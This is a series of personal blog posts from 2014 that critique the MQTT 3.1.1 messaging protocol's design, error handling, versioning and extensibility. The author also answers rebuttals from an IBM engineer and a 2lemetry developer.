June 16, 2014
@ 07:02 AM

Last week, IBM's Peter Niblett posted a response to my MQTT analysis and says that he is keen on a positive discussion on my observations as a contribution to the future development of MQTT by the OASIS Technical Committee that is working on MQTT. Thank you, Mr. Niblett.

That said, a friend who works as a messaging product architect at another major platform vendor chatted me on Facebook after reading the IBM post and wrote "Good response, but nothing in that post convinces me that anything you wrote was wrong". I agree in that I don't see a need to make updates to the original post.

What's worth restating in this discussion is that I took the OASIS 3.1.1 version as published an implemented it from scratch. There ought to be no need for being "in the know" or be member of a particular discussion circle to do so. The protocol is exactly and only what the specification document says it is. Peter is providing several clarifications on technical aspects or on spec intent in his post, which I appreciate, but one of the key points of my critique is that this ought not to be required. What I say about the protocol are statements about the specification.

I'm going to use Peter's post structure:

i) Scope and intended use of MQTT

Peter starts out with providing some insight into the history of MQTT stating that it has been used for over 15 years and that it were a better starting point than some "radically new, untried protocol" and it were better to "standardise what already works".

I think that's a reasonable way to start, if the protocol had proven, for that much time, that it does indeed provide secure and reliable message transfer, at very significant scale, in the sort of dynamic networking and operational environments that we're debating in "Internet of Things".

I am not at all arguing that it's impossible to get messages from A to B with MQTT. I am arguing that the protocol is becoming increasingly more unsuitable as the communication path quality between A and B deteriorates, the parties can be less trusted, and as the count of the A's go into the 100,000s and the B's become large always-on clusters with failover, in-place upgrades, and a ton of required moving pieces of which many can and do fail every once in a while.

If the protocol is 15 years old and originates from factory floor environments, it's obvious that it wasn't designed for this new world; even the mighty HTTP 1.1 is getting a massive overhaul now after 15 years, since the web community sees that new usage patterns and requirements call for the dramatic changes that are embodied in the current HTTPbis drafts. So, yes, I do indeed call into question whether MQTT "already works" for the future challenges that lie ahead.

ii) Error Handling

In my post I mentioned that I've been involved in shipping Azure Service Bus for the last 7 years. What I didn't mention there is that "shipping" also means "operating". Not only do we ship this software, we also run it ourselves. Just like any other engineer on the team, I've been on the 24/7 on-call rotation for the past 5 years that our service is in production, and we've learned taming the fire-breathing dragons that are several dozen large clusters of hundreds of nodes each that are distributed across datacenter fault domains and get updated and serviced under full load – they're tamed, but they're still fire-breathing dragons. Part of the art of taming these dragons is as much transparency on what goes wrong and where and why as can be feasibly provided. There is no winning argument that can be made against making appropriate diagnostics information available to all communicating parties.

In his reply, Peter argues against putting error information on the wire, because that would serve no purpose:

If the protocol were to send detailed error information to the clients, it's unlikely that they would be able to do much with it other than send it back in to a central Problem Determination system. It's more practical for error logging and diagnosis to be done centrally by the server, so in many cases there's no real need to pass the information to the clients.

That's an interesting stance, because of the inherent notion that server and client are part of a system that can be supervised and analyzed centrally. That may be true for a traditional enterprise or factory floor messaging system. It's not true for any contemporary solution I get to help with.

All communicating parties need to be able to understand what went wrong and why, during development time and at runtime, especially with globally distributed parties, distributed ownership of digital assets, and when communication spans trust boundaries.

Imagine HTTP were doing this and client induced errors got no feedback. Would there be some server where you'd have to look up your 404s?

Also, and that's a nit on the above point, the publishing gestures of MQTT are symmetric and if a device rejects a message sent by a server for any reason, even such a problem determination system would be in the dark, because how would it ever get at that information if the client hoards it?

The stance reveals a lot about why this debate is happening: MQTT carries the DNA of an architecture model where all parts of the system are built, owned, and operated by one party, and where that one party has or can easily gain access to full access to such diagnostics information at all times.

In the same section, Peter defends the absence of an error feedback path for PUBLISH:

The server is permitted to accept an unauthorised PUBLISH message and not drop the network connection, provided that it doesn't forward the unauthorised message on to any subscribers.

While that seems like a reasonable workaround, that is not what the specification says. The spec says "If a Server implementation does not authorize a PUBLISH to be performed by a Client; it has no way of informing that Client. It MUST either make a positive acknowledgement, according to the normal QoS rules, or close the Network Connection".

The specification doesn't state Peter's authorization caveat, at all. In fact, there are actually rules in the QoS section of the specification that stand against this approach; for instance "A Server MUST store the message in accordance to its QoS properties and ensure onward delivery to applicable subscribers" [MQTT 4.3.2-2].

In MQTT an authorization failure during publishing will either cause the connection to drop or the server will – if following Peter's strategy – intentionally lie to the client.

Imagine the astonishment of a client who is sending gigabytes of gold-plated mobile M2M bytes into a misconfigured server for several days where authorization rules are wedged, and the server is happily reporting the messages accepted, and actually tosses them out as they get there. That recommendation is worse than disconnecting.

iii) Session State Durability

In this section, Peter provides some further explanation of the session state model, in clearer terms than the specification I am discussing, and says

[…] a server is indeed entitled to kill a Non-Durable Session if it wishes, though presumably customers would think twice about using a server that does this a lot. 

My point is that the specification is wishy-washy about it and that it ought not to be.

The point is also that in a world where software systems aren't running within the four walls of one company, there's no necessarily a choice about whether or customers will or will not use a particular server. That server sits over there, is run by someone else, and you have to use it. For that, the specification ought to provide predictability and clear guidance, including – potentially – reliability profiles. A purely ephemeral in-memory server shouldn't even have to pretend to support QoS 2 or "Retain".

1) Suitability of MQTT for IoT use-cases

In this section, Peter defends MQTT's suitability for IoT use-cases by commenting on some of the points I made in my original article. Of the ones I didn't already address above only the TLS session resumption argument stands out for me:

On my paraphrased point "Transient errors force a disconnect, which results in a renegotiation of a TLS connection and this is costly", Peter responds "I would hope that, although they will occur, transient errors are likely to be rare - probably rarer than network failures. In any case TLS has a special path that allows a Session to be resumed quickly without going through the full TLS handshake."

TLS has, in the form of RFC5077, a stateless session recovery model, which is available via explicit opt-in gestures on server and client in most SSL/TLS libraries. The MQTT 3.1.1 specification mentions this RFC.

Peter is correct that RFC5077 support will limit the impact of disconnects, I'd be interested in how many libraries implementing TLS/SSL for MQTT are also leveraging this feature of their respective underlying SSL/TLS library so that this can be consistently relied on.

In my original post I criticize the name-dropping in the security section, which looks like a scratchpad of notes rather than firm guidance. The mention of RFC5077 looks like this:

Constrained devices and Clients on constrained networks can make use of TLS session resumption [RFC5077], in order to reduce the costs of reconnecting TLS [RFC5246] sessions.

If it were sticking to its "in doubt: disconnect" attitude around errors, which I don't hope, it would do the protocol good if it were taking more assertive ownership of its security model and prescribed how TLS ought to be used in precise terms, including prescribing RFC5077 support.

2) Difficulties of Implementing an Internet Scale MQTT Server

Peter admits that it is hard to build multi-server MQTT servers, but points out that there are available implementations. I'm somewhat struggling to find MQTT servers that support the breadth of the spec (including QoS 2) in a multi-node configuration of non-trivial size (i.e. more than 4 nodes) with robust failover support including in-flight deliveries.

I looked at a few.

RabbitMQ doesn't seem to support QoS 2, ActiveMQ/Apollo's MQTT adapter holds in-flight deliveries in non-replicated in-memory state, for Mosquitto I can't find the clustering option, even IBM's MessageSight appliance only seems to support a hot/warm clustering model with at most two nodes, and HiveMQ seems to replicate messages between cluster nodes, but doesn't appear to replicate in-flight delivery state for when a node fails and a secondary kicks in.

Now, I only looked at a few and I'm only looking at things from the outside where I can't see code or clustering docs, so I'll be happy to hear if there's something I can look at for reference.

3) Missing Features you would expect in a Messaging Protocol

This is the section in Peter's post that I am very grateful for, because he's acknowledging that I identified a list of shortcomings that seem reasonable to consider for a future version.

Where I disagree with Peter is that metadata extensibility shouldn't go beyond the PUBLISH package. I believe the MQTT spec would benefit from a generalized message model where variable headers and their format options are clearly defined upfront, instead of having to infer them from the individual package descriptions. Why such a generalized message model couldn't also define a model for carrying a metadata dictionary isn't clear to me.

In closing

Lastly, Peter calls Microsoft to action. Whether Microsoft might or might not join the OASIS TC isn't a point I will or even can debate here, because I'm not speaking for the company here on my own personal blog (and these posts don't go to blogs.msdn.com/clemensv if you noticed). I'm also not working in the group at Microsoft that drives standardization, so I would likely not be directly involved in the day-to-day TC work, in any event, since my day job is implementation, not creating specifications.

What I would consider a prerequisite for me recommending such an engagement were – if someone were to ask me — that the TC were willing to allow for significant changes for the next revision and strike the backward compatibility mandate.

I stand by my statement that MQTT, in the current form, is not a protocol that's setting us up well for the "Internet of Things" future as I see it. The protocol needs urgent fixing in error handling, and message metadata flow, it ought to – in my view – provide a clearly delineated set of reliability and feature profiles making features like retain, Will, and QoS 1/2 optionally layered as some are very hard to implement correctly at scale or require special authorization and resource governance models, and it needs to take firm ownership of authorization and its on-wire security model, including explicitly allowing for token-based authorization of sessions.

-

Thank you for reading this and I hope you consider this useful in spite of the leadership of the Eclipse Foundation (and oddly really just them) calling my posts FUD, flame war, and not a community service. I believe this discussion is a community service. And I wrote this on Sunday.

Categories:

June 4, 2014
@ 07:10 AM

Tim Kellogg from 2lemetry felt compelled to write a response to the MQTT analysis I posted Monday. Debate is good.

I believe there is a difference, however, between being directly and openly critical of the product of an public standards body that gets broadly advertised as the “de-facto” standard by the specification’s main sponsor and individual name calling.

Tim chose to describe me as “a man who prefers flame wars over professional dialog” based on that post and in spite of having civilized exchanges with me on Twitter in the past. This didn’t strike me as a particularly good example of professional dialog by itself, so I felt like I ought to call out that sentence on Twitter.   

So … Dear Tim, I spent quite the better part of a week implementing my MQTT 3.1.1 protocol core and I spent 3 days furnishing a critical, in-depth technical analysis of MQTT, including providing what I believe is required industry context from my vantage point about the role of a particular major vendor. If you find this personally offensive and the analysis and backstory portrayal challenges you personally into a “flame war”, I don’t know quite know what to say about that.

Tim also states “Obviously Clemens misunderstands the goals of MQTT”, which is a fine rhetorical attempt to blanket-disqualify of my analysis. Maybe that is even true is a very narrow sense in that I care very little about the immediate goals of the OASIS MQTT 3.1.1 Technical Committee and instead have a laser focus on solving the immediate problems brought to me by a range of large consumer and industrial goods manufacturing companies that want to get going with realizing their Connected Home, Connected Car, Industrie 4.0, or Smart Energy solutions at scale. In that sense, I may “misunderstand” the goals in that I actually disagree with some of the goals for the benefit of these customers.

MQTT has no facility for an application to hint at the payload content, carry a key hint for end-to-end encrypted payloads, provide a message subject or label for dispatching the message before decoding the payload, or to even carry a timestamp for when the message was sent on its way at the origin. I am personally convinced custom metadata extensibility is part of the table-stakes for any messaging protocol that I will recommend to my customers, even if Andy Piper seems to believe that this insistence and the remainder of my analysis is laughable (without linking to it!) and asking for “the kitchen sink”.

Another underhanded questioning of the correctness of my analysis was:

Indeed, I do allude to chat, which was actually meant as a reference to the Facebook Messenger scenario in the abstract. The MQTT post is 9500+ words and I scoped out the interactive scenario. I actually have reached out to my friends in Facebook engineering to get insight into the exact MQTT usage profile, but I can already say that an interactive chat application on a $500 mobile phone with a flat rate data contract on 4G/LTE isn’t quite the same as the two scenarios (connected car and smart meter) I mentioned in my write up. The car scenario and the data volume constraints I mention are not a fabrication, and the national roaming network hopping issues don’t exist for phones on voice contracts, because providing cross-carrier roaming is massively constrained by regulation. Apples and Oranges.

Back to Tim, he’s also making the somewhat surprising statement in response to my IBM references on MQTT that “IBM has mostly left it alone” in the standardization process. I’m afraid I can’t follow that claim looking at the TC chair and the specification editor list.

Tech

Tim also has technical responses, of course. Sadly the slightly miffed undertone (“almost valid”, “didn’t seem to take time to fully understand that.”) continues:

“One complaint that is almost valid is the variable 1-4 byte remaining length field […]”

In this paragraph he says that I’m asking to constrain remaining length to 2 bytes. I’m not, I offer 2 or 4 bytes: “It could also just say that the length indicator is either two or four bytes long and if bit 15 of the two-byte integer were set, it'd be a 31-bit integer and you need to factor in the next two bytes and just mask out the most significant bit.”. I fact, I’m ok with both the 7-bit encoding or fixed-length prefixes if their use only were consistent in the protocol.

On my critique of the version identifier, Tim says my proposal were for the “MQTT” string to “be just the raw 4 bytes without the prefixed length”. That again reflects quite cursory reading of what I really wrote, because I am quite specifically asking for a different shape of those 4 bytes and I ask to move them to the beginning of the MQTT stream: “the UTF-8 characters for 'T' and 'T' and a trailing version counter of two bytes as you'll want to give yourself some room for spec revisions, instead of presenting this were an extensible thing? And then put that 4-byte preamble at the beginning of the stream, so a server can pick the implementation stack as the connection opens?”

In the next paragraph he objects to me adding the underlying protocol overhead of IPv4/6, TCP, and TLS to the size of the MQTT message wire footprint, pointing at the effects of Nagling (see RFC896). Nagling means that a network frame gets stuffed with data until either the designated output frame is filled up or until timer elapses (often 200-500ms). Which I explicitly refer to in the respective paragraph in my post.

Yet, in the next paragraph he also objects to me pointing to an overflow and collision risk on the packet identifier with 64K in-flight messages. It’s difficult to argue nagling and minimal wire footprint and then object to that being pointed out as a risk. Tim says that a device with 100Kbyte would never have as many messages in flight. I agree. An industrial machine funneling consolidated sensor observations to an analysis backend quite well might and that might want to take advantage of a low-overhead protocol over a long-haul stream transport (Tim offers MQTT-SN, an IBM protocol not in OASIS, as an alternative, but that’s exactly not for TCP as per mqtt.org).

Coming back to the extensibility point, Tim argues that “content-type” were non-sensical because all common use of MQTT is using a particular set of conventions, like the payload containing UTF-8 text for metrics values provided on (nonstandard) system topics implemented in some brokers. I agree that convention is good, but even in the given use-case I may prefer expressing numbers as binary integers and there’s no way I can express that preference. Content-type negotiation is such a foundational concept today that it’s really hard to successfully maintain that argument.

Discourse

The notion I reject and which not only Tim, but also several others have expressed is that I ought to have brought these points to the Technical Committee during the comment period on MQTT 3.1.1 and that my blog and Twitter (and thus a debate out in the open) are not the right forum to voice such concerns. The suggestion is that I ought to take all this to OASIS so that it can be discussed on the mailing list – which is open to the public to view, but it’s obviously not quite as visible.

There is a very odd sense of entitlement being expressed here. When I take a public specification, especially one that’s getting so much marketing push, and implement it as a programmer/architect, I owe the Technical Committee absolutely nothing, irrespective of my place of work. My job is to create platform solutions for large scale business applications. I evaluate protocols, interpret and implement them, and move on to the next protocol. I’m not a protocol standardization diplomat. Microsoft is a large company, and we also have quite excellent people in these roles. My role or career doesn’t hinge on a particular protocol; if AMQP (of which it’s said that I’m underhandedly promoting it) were to fall off the face of the earth tomorrow I’d shrug and implement the next thing, if there were an adequate replacement.

When I find that the reality I find is in grave dissonance with the marketing claims, however, I believe that I owe the public and specifically colleagues, partners, and customers who come to me and seek my immediate advice, an in-depth analysis of what I found, and share that on the stage I have. Which is this one. You can go back more than 10 years here and find out, this is how I roll, before and during my Microsoft career. The OASIS TC can find this consolidated feedback quite well here and it looks like it made it to the mailing list alright.

It’s also been criticized that I bring this forward just after the public comment period of MQTT 3.1.1 finished and that that timing is suspicious. It’s not. Turns out that the sort of changes I am proposing are largely out-of-charter for MQTT 3.1.1. The TC charter is very clear:

Changes to the input document, other than editorial changes and other points of clarification, will be limited to the Connect command, and should be backward compatible with implementations of previous versions of the specification such that a client coded to speak an older version of the protocol will be able to connect to, and successfully use, a server that implements a newer version of the protocol.

That’s been reinforced by Nick O’Leary’s comment in March:

There was actually no point in bringing any of these points to the TC before 3.1.1 is done and they are gearing up to actually fix the protocol deficiencies, which I am not alone in finding:

It’d be awfully nice if the folks invested in MQTT would be willing to have a serious technical debate and acknowledge that my analysis and proposals have merit instead of trying to ridicule it. I have an enormously thick skin for ad-hominem arguments; you can call me things if that helps the ultimate goal of getting to a solution that helps my customers.

I may have brought the firewood to the town square, but I didn’t light it.

Categories:

A few weeks ago, I sat down in front of an empty C# project and with a printout of the latest OASIS MQTT 3.1.1 specification review draft and started to implement the protocol from scratch.

There were several, including a few non-technical reasons not to pick up an existing implementation like, for instance, Paolo Patierno's M2Mqtt library (which I'm using a test client), which included requiring a server implementation with a certain shape of hooks, but a key reason was also that I wanted to understand the MQTT protocol at an implementer's level.

As I started, I had good but still cursory understanding of MQTT, which was probably about at the same level as anyone reading the "the de-facto standard protocol of Internet of Things" claims in semi-technical articles that cover its existence, but not its function. Published consensus is that it's very compact, it's easy to implement, and it's originating from and backed by IBM, and therefore must be a default good choice for device scenarios.

After implementing most of it, and I will explain which parts I left out and why, I am very disappointed.

Two exemplary scenarios I have in mind as I write this are bi-directional, long-haul communication with moving vehicles on GSM/LTE with national cross-carrier roaming, and bi-directionally connected Smart Meters on 802.15.4 based networks over unlicensed, and thus potentially very congested, public frequency spectrum. These are two key volume scenarios for the "Internet of Things" as I see it shaping up. Interestingly, you can read success stories for MQTT for these exact scenarios; and I do have some sense for how well things are really going in some of those.

The conclusion I will explain in this post is that MQTT is not a good protocol for long-haul communication (i.e. across the Internet), especially not when the going gets tough. It's also not a particularly well-designed protocol. That is also why this article is as long as it is.

Before I get into the details, there's a little bit of backstory that ought to be told and that backstory is about IBM and the context in which MQTT came into being. As you consider the following, mind that while I work at Microsoft, this is my personal perspective, I'm not having my posts read, reviewed, or approved by marketing. I care about stuff working right, and about making stuff work right, and I also care also about honesty and transparency in engineering.

IBM has a very successful enterprise messaging business and has had it for many years; related product names are MQSeries and WebSphereMQ. "Successful" is an understatement. They dominate the space. As they dominate, IBM has held the MQ wire protocol under tight wraps, until today. The Advanced Message Queuing (AMQP) protocol development effort started as a customer-driven initiative of Wall Street banks aiming to create an alternative messaging protocol with the goal of breaking out of that lock-in.

It is very interesting to observe how IBM are now playing open-protocol champions, having repurposed the "MQ Integrator SCADA Device Protocol" into MQTT, and drive community efforts on the connected devices front, while still keeping MQ closed, and are conveniently positioning a fairly expensive messaging appliance offering as a bridge.

That appliance speaks MQTT out to the device-side and MQ out to the backend-side. IBM has steadfastly refused to join the AMQP effort from the earliest days, so it doesn't seem like the motivation behind their strategy is ubiquitous messaging interoperability. I believe, personally, that IBM has published MQTT specifically to segregate messaging protocols in order to protect the MQ business. I believe IBM kept and keep MQTT intentionally limited. Yes, IBM indeed has an AMQP 1.0 protocol runtime in Beta called MQ Light; which seems like a nice way to funnel AMQP traffic into MQ without implementing AMQP. But this article is not about AMQP. It's about MQTT.

MQTT is not a messaging protocol; I would call it a funnel protocol serving to move binary frames of data, preferably from constrained clients into data collection systems. It's too limited for actual messaging work, which requires message metadata that a broker can work with. It is doing reasonably well at a very, very narrow set of use-cases and it is terrible at everything that goes beyond those use-cases. What it's reasonably good at is best-effort, raw-data ingestion from clients and best-effort raw-data delivery to clients using a solicit-push pattern (I'll have an explanation later). And as it turns out, the things MQTT is good at can be done in much simpler ways, while retaining more flexibility at the same time.

As we go through MQTT, the text will have many hyperlinks to various places in the MQTT specification, so there's no great danger for me to get off the rails with regards to the facts. Mind that the hyperlinks can't go to precise sections because the OASIS MQTT 3.1.1 specification doesn't have a lot of hyperlink anchors.

My goal is to simultaneously explain MQTT coarsely (go to the spec for details) and then comment on it.

Connection Model

MQTT is a session-oriented protocol overlaid over a stream transport protocol that has a clear notion of a client and a server [MQTT 4.2]. On TCP, MQTT clients connect to the server port 1883 for plaintext communication (the IANA port registration shows as ibm-mqisdp). Using TCP with overlaid TLS, MQTT clients connect to the server port 8883 for secured communication. [MQTT 5.1]

A MQTT connection over an existing (TLS-) socket is established though a handshake, with the client sending a connect packet, and the server replying with a connack packet. When the session is rejected, the server will terminate the connection after connack has been sent, which will then contain an error code.

The connect packet allows initializing quite a few capabilities. Because it is the first message flowing, it carries a protocol name and version indicator. It also carries a set of protocol flags that describe the connect message itself and how the broker shall treat it, and depending on those flags it optionally carries authentication information (username/password), and also a "Will" message.

"Will" [MQTT 3.1.2.5] is an interesting concept. It allows the client to park a message with the server for the duration of the session, and that message gets published on the server to a specified "Will Topic" once the session gets unexpectedly torn down for any reason. A clean "disconnect" from the client will cancel the "Will", i.e. it will not be sent.

Message Structure

One of MQTT's goals is for it to be super-compact on the wire. That's also arguably one of its greatest appeals. To that end, the preamble of each message can be as tiny as 2 bytes. The first byte splits into two nibbles [MQTT 2.2].

The first nibble (4 bits) indicates the packet type and the second nibble holds special flags related to that packet type. The packet type serves as the operation selection criterion for the MQTT stack. The protocol can therefore accommodate exactly 16 different packet types, of which 14 are currently used and 2 have a hard reservation, causing a mandatory protocol violation error when used [MQTT 2.2.1].

The second byte is the start of the packet length indicator, which is a sequence of 7-bit integers (value sits in bits 0-6). Whenever bit 7 is set, the next byte carries a further value complement and the current length value shifted up by 7 bits. Thus, a packet length of 127 or less can be expressed in one byte, and as there are four bytes allowed, the encoding allows for packets of up to 256Mbytes [MQTT 2.2.3].

This preamble sets the tone for most of MQTT, which is that the protocol is dictated by (unfortunately not consistent) wire-footprint greed and will trade away many of the key capabilities of modern protocols for reduction of wire footprint. Unfortunately, the spec doesn't tell the whole story about the actual wire footprint, and some of the decisions start looking questionable once you start looking at the true wire-footprint with IP and TCP headers and the requisite TLS framing added, as well as what you need to put into the payload to compensate for what MQTT does not provide.

The packet type indicator nibble with the accompanying flags nibble is nicely demonstrating that greed, but simultaneously also showing that MQTT doesn't have much future runway as a protocol without some drastic changes. If the protocol needs to add just one more packet type (and that need exists if proper error handling were added), the only way to rescue the current structure were to use the last reserved value as an escape hatch, and start putting packet types elsewhere, and the only good place seems to be that other nibble since everything else would mess up the protocol structure even more. So the extensibility runway even for new protocol revisions is very constrained.

The length indicator greed and related computation requirement is also somewhat surprising when we consider that the goal is to connect very constrained devices on metered networks and that you may not only want to be saving every byte, but also saving on overall protocol overhead and compute overhead.

The extra protocol overhead sizes to be aware of are at least 40 bytes TCP/IPv4 and 60 bytes TCP/IPv6 packet overhead for any first-try successful transmission, plus about 40 bytes TLS frame overhead. On IPv6 networks, which will be the norm for at least part of the communication paths for many devices in the future, the base transport packet overhead thus sits at some 80-100 bytes at a minimum. This is the base wire-footprint cost for any MQTT packet, when we neglect Nagling effects where a device would send many distinct messages within a short time that then would be able to hitch a ride inside the same TLS frame.

In this overall context, MQTT chooses 7-bit encoding requiring a calculation that the spec even includes pseudo-code for. It could also just say that the length indicator is either two or four bytes long and if bit 15 of the two-byte integer were set, it'd be a 31-bit integer and you need to factor in the next two bytes and just mask out the most significant bit. That's easier to code, and it also frees up 2 more bits.

You'd pay for a simpler model with potentially losing 1 byte compared to the 7-bit encoding on messages smaller than 128 bytes. It's worth debating whether sending messages of 128 bytes or less (including further MQTT overhead that I'll discuss in the following) is a good use of precious metered bandwidth. At that size, going to be sitting at or near 50% pure protocol overhead over your payload when using TCP/IPv6 and overlaid TLS. But you will have saved a byte.

Following the 1 to 5 bytes of preamble ("fixed header"), MQTT defines specific layouts for the various control packets. The first portion of that layout is called the "variable headers" [MQTT 2.3] and the second is called "payload" [MQTT 2.4], but the spec is fairly confused about where to draw the line between these and how they're interrelated.

On the connect packet, the "variable headers" carry the protocol version identifier, keep alive indicator, and session control flag, but also declare the layout of the following payload section. The payload section then begins with the mandatory client identifier, and it feels very arbitrary that this ought to be a payload component while the version indicator string is a header component.

It's appearing just as arbitrary that the "Will" mechanism is shred apart across the header section (QoS) and the payload section (topic and payload). Sadly, that is a theme of the spec in that it lacks principle on what is payload and what is header.

There are four kinds of header value encodings in MQTT

The two-byte length-prefixed string is inconsistent with the 7-bit encoding effort on packet length; even the MQTT version-indicator string header in the "connect" packet is wasting a byte with an extra zero for the 4-character string "MQTT".

Protocol Versioning

The versioning story of MQTT is a sad chapter and nearly comical given all the greed that goes into the preamble. The MQTT 3.1.1 connect message burns up 7 bytes to tell you who it is, and the MQTT 3.1 connect message (IBM's last version before submitting to OASIS) burns up 9 bytes for announcing "MQIsdp" and the protocol sub-version, which is a single byte header following that string.

When a protocol implementation is able to read that version indicator, it's already at least 2, if not 5 bytes into reading the message as the protocol and protocol version indicator trails the fixed header preamble. The specification also treats any use of unspecified values as a protocol violation. It doesn't do so for the packet types explicitly, but it does so for the associated flags, so if you wanted to implement the current version correctly, you will be nuking the connection before you can even read the version string, if a new revision of the protocol would want to be introducing a new packet type or change permitted flags.

That means that the fixed section of the protocol is, if implemented correctly, effectively locked in forever in the current shape, and it will require hacks to change.

What I absolutely didn't expect was that MQTT 3.1 and MQTT 3.1.1 (the OASIS edit) would use a wholly different protocol identifier string. A MQTT 3.1.1 client will cause any correct MQTT 3.1 broker to reject connections, even though that's the only difference between the versions. What's worse is that the spec further limits its own runway by locking that in, making the length indicator bits explicit and normative and stating: "The string, its offset and length will not be changed by future versions of the MQTT specification." [MQTT 3.1.2.1].

Then why have all these 6 bytes and not just use, maybe, the UTF-8 characters for 'T' and 'T' and a trailing version counter of two bytes as you'll want to give yourself some room for spec revisions, instead of presenting this were an extensible thing? And then put that 4-byte preamble at the beginning of the stream, so a server can pick the implementation stack as the connection opens?

Extensibility

If your impression so far is that MQTT is an extensible protocol, as I have been writing about fixed and variable headers, control types, and payloads, then I must apologize for misleading you in the same way that the MQTT spec is misleading. MQTT is not extensible, at all.

MQTT is a protocol design that sets the clock back at least 20 years, while the rest of the distributed systems community has made extensibility and Postel's robustness principle driving considerations for practically all modern protocol designs.

If you read the spec and ignore the differentiation between "header" and "payload" and just think of the various information bits as "fields", you get closer to what the spec actually describes. The "connect" message is composed of a sequence of 8 required fields and 4 optional fields. The optional field's presence is indicated in content of the prior 8 fields.

"Header" telegraphs the presence of a concept that MQTT doesn't provide and that you may think of reading the spec: custom message metadata extensibility.

The MQTT has no facility for a client to communicate application-specific information to the server or the recipient. There really are no application-usable headers. There is no specified way for the client to indicate anything about a published message to the infrastructure and there is no specified way for the client to attach metadata to a message that provides functional information outside the message payload.

For someone accustomed to protocols like HTTP, XMPP, AMQP, or even approaches where people throw JSON on a WebSocket, the notion of lack of extensibility may be pretty hard to grasp in a "what do you mean?" kind of way. There is no custom metadata. Whatever you want to tell the other side outside of what the spec says, must go into the payload and it can only go into the payload of the one packet type that allows for a free form payload: publish.

The rest of MQTT, all other 13 defined gestures, is a non-extensible locked box and one with a weak versioning story at that. You either take the protocol as-is, in the current shape, or you don't. Some people might see that as a virtue; I find the notion of lack of extensibility for the key gestures of a protocol horrifyingly backwards.

There are obviously potential hacks to get around that limitation for that one precious publish packet type. It's conceivable to throw custom metadata into the publish message's topic name field in a sort of a query string – but what would be the format of that? Hacks are hacks.

Payload Encoding

One mainstream use-case for MQTT is telemetry ingestion (as it is the "MQ telemetry transport", after all). That means the client just needs to know two gestures: connect/connack as discussed, and publish.

The publish packet carries a number of flags (that I'll get to later), the topic name, and a packet-identifier whose presence depends on the flags. That information is followed by a free-form binary payload, whose length is determined by subtracting the length of the topic name, including its own leading length indicator, and the length of the packet-identifier from the remaining length included in the fixed header.

As a result, you find two subsequent length indicator fields (remaining length and topic name length) on the wire that are interrelated as you decode them, and that's where MQTT gets caught up in its faked up "header" model, and its protocol-manifested desire to be wanting to know the length of the message and read the entirety of the message into memory before beginning to process it.

That's the opposite of HTTP, which – with some success – uses a model allowing incremental discovery of the message that also permits payload chunking. It's also different from AMQP or WebSockets, which both have a cleanly layered notion of framing, and where each frame has a frame-length preamble, before there's any consideration about what's in it, so the transport stack can pull a frame off the network without having to communicate any information discovered in the process to an upper layer. Even XMPP, whose XML-fragment based framing model I personally don't like much, allows the network reader to pull a frame off the network without considering the contents other can counting the balance of elements and attributes. The MQTT design throws a bit of significant protocol right in front of the framing and therefore introduces unnecessary coupling.

The great sin of MQTT with regards to payload is that it is completely oblivious to payload. Not only does MQTT not define a payload format as AMQP or XMPP or JSON-over-WebSocket do, it doesn't even provide negotiable or at least discoverable content-types or encodings as HTTP and AMQP do. On the subscriber side of an MQTT communication path you just have to know what's in that byte array. There is no facility to tell you what the content-type or content-encoding might be. This is a protocol in active standardization in the year 2014. It's unbelievable.

As a consequence, stating that a system supports MQTT can't be a complete statement. You really have to say "mqtt+bson", "mqtt+json", "mqtt+protobuf", or whatever you use as payload encoding, because the protocol gives no indication and, yet, payload and framing are necessarily coupled when you're in the publisher or consumer role. A broker can be oblivious to the payload, its clients can't be. The MQTT specification isn't showing much consideration for the needs of those.

Errors

Amazingly, MQTT does manage to take it up a notch from unbelievable to inexcusable when you look at the error handling strategy.

MQTT's error handling model for everything from client-side protocol violations to intermittent error conditions, where a server can't flush a message to disk for whatever is reason is for the server to drop the network connection. The rule is that whenever something happens that's unexpected and not written down in the spec as the blessed one way, the server will cut the cord, with no explanation.

The sole exception from that rule is the connect/connack handshake where connack does indeed define a set of error codes that explain why a connection cannot be established. However, should you be making the mistake of sending "connect" and have one of the header flags wrong, the server will (must) cut the socket even before replying with "connack".

This toddler-like attitude of MQTT towards error conditions instantly disqualifies it as a serious protocol choice for practically all use-cases where predictability and reliability matters, it makes the protocol hard to debug, it's also actively sabotaging MQTT's goal of providing minimal wire-footprint.

The strategy really something to behold: For an application field where wireless communication with significant traffic contention and packet loss and network-roaming clients with frequent disconnects due to cell-tower hopping will be the norm, MQTT indicates errors, including those caused by transient conditions in the broker, by making them indistinguishable from network-infrastructure imposed error conditions and absolutely impossible to diagnose.

The strategy also demonstrates MQTT's inherent obliviousness of the wire-footprint and latency effects of adding security to the transport layer. The protocol is greedy to the single byte, but in the case where the server's storage layer were having the hiccups for a minute (and that happens in a distributed system), the protocol is perfectly happy to toss out a negotiated TLS channel with the socket at the bottom of it, and force the client to restart into a multi-hop handshake that may include, depending on TLS authentication mode, the mutual exchange of certificates, potentially weighing in at 5-10 kBytes per reconnection attempt over networks with a few hundred milliseconds of base roundtrip latency. Because the server has the hiccups. The client and the client's metered M2M data plan link are paying for the server having the hiccups.

Anyone with any experience of operating scale-out systems ought to be offended by a design that assumes backend reliability perfection and lays the blame on the client if that assumption cannot be satisfied, with the backend assuming zero responsibility and not even telling the client what's wrong.

In MQTT's error handling mode, the client has no way of distinguishing between a weak network link with excessive packet loss, the timeout of a NAT session, roaming-imposed change of network address causing a socket collapse, or the server having the hiccups. As the client can't tell, it's only chance is to aggressively reconnect if it needs to get rid of data and thus it will run up the phone bill specifically when communication infrastructure is not at fault.

I'll be revisiting the error handling aspect a little later when we get to reliability.

Subscriptions

The way you receive messages from an MQTT broker is by creating a subscription. MQTT subscriptions are different from those in many other brokers in that they set up both a filter-based delivery route and a message solicitation gesture at the same time, and that the message solicitation gesture is active for as long as the subscription is active.

In other words, you tell the broker what you're interested in, and then you tell it that you want to get any message fitting that criterion as it becomes available without doing any further action. MQTT implements a "solicit push" pattern; the client connects and establishes a delivery route for messages and either creates a new subscription or reuses an established subscription set up during a previous session with the same client-id. If any messages are available at the time of connection they'll be instantly delivered and further messages will delivered into the existing connection to clients with a matching subscription as they become available.

The push model is great since it relieves you of having to pull individual messages or batches of messages; there is no need for a "receive" gesture. There is no "polling" as some people might put it, and the absence of that is something many people seem to find an attractive feature.

The flipside is that while there is no explicit need to pull, there's now also no ability to control the flow of messages coming up the pipe to the client other than refusing to read from the socket. That's not a problem for scenarios where the client is performing a singular task or several tasks that do not take any significant work like displaying a line in a chat window.

